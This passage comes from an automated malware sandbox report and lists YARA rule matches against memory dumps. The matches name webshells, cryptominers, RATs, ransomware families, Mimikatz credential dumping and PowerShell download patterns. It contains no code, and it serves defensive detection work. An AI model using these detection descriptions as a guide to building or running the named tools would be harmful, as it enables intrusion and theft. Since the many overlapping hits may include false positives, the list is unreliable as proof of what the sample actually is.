(False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp, Author: FireEye Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Baldr, Description: Yara detected Baldr, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Knot, Description: Yara detected Knot Ransomware, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nephilim, Description: Yara detected Nephilim Ransomware, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security Rule: hacktool_macos_keylogger_logkext, Description: LogKext is an open source keylogger for Mac OS X, a product of FSB software., Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, Author: @mimeframe Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Vidar, Description: Yara detected Vidar stealer, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ByteLocker, Description: Yara detected ByteLocker Ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Artemon, Description: Yara detected Artemon Ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_lazparking, Description: Yara detected LazParking Ransomware, Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_generic_eval, Description: Generic PHP webshell which uses any eval/exec function in the same line with user input, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: ChinaChopper_Generic, Description: China Chopper Webshells - PHP and ASPX, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_mock, Description: Yara detected Mock Ransomware, Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, Author: Joe Security Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Oilrig_IntelSecurityManager, Description: Detects OilRig malware, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Eyal Sela Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Winexe_tool, Description: Yara detected Winexe tool, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_gogoogle, Description: Yara detected GoGoogle ransomware, Source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, Author: Joe Security Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp, Author: Cylance Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18297604848.00000138BD4A8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18357184238.00000138BD9CA000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp, Author: Joe Security Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: USG Rule: IMPLANT_5_v3, Description: XTunnel Implant by APT28, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: US CERT Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NoCry, Description: Yara detected NoCry Ransomware, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Joe Security Rule: malware_red_leaves_memory, Description: Red Leaves C&C left in memory, use with Volatility / Rekall, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Joe Security Rule: PoisonIvy_3, Description: unknown, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, Author: Joe Security Rule: korlia, Description: unknown, Source: 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp, Author: Nick Hoffman Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18352805869.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_MSIL_SharPersist_2, Description: unknown, Source: 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 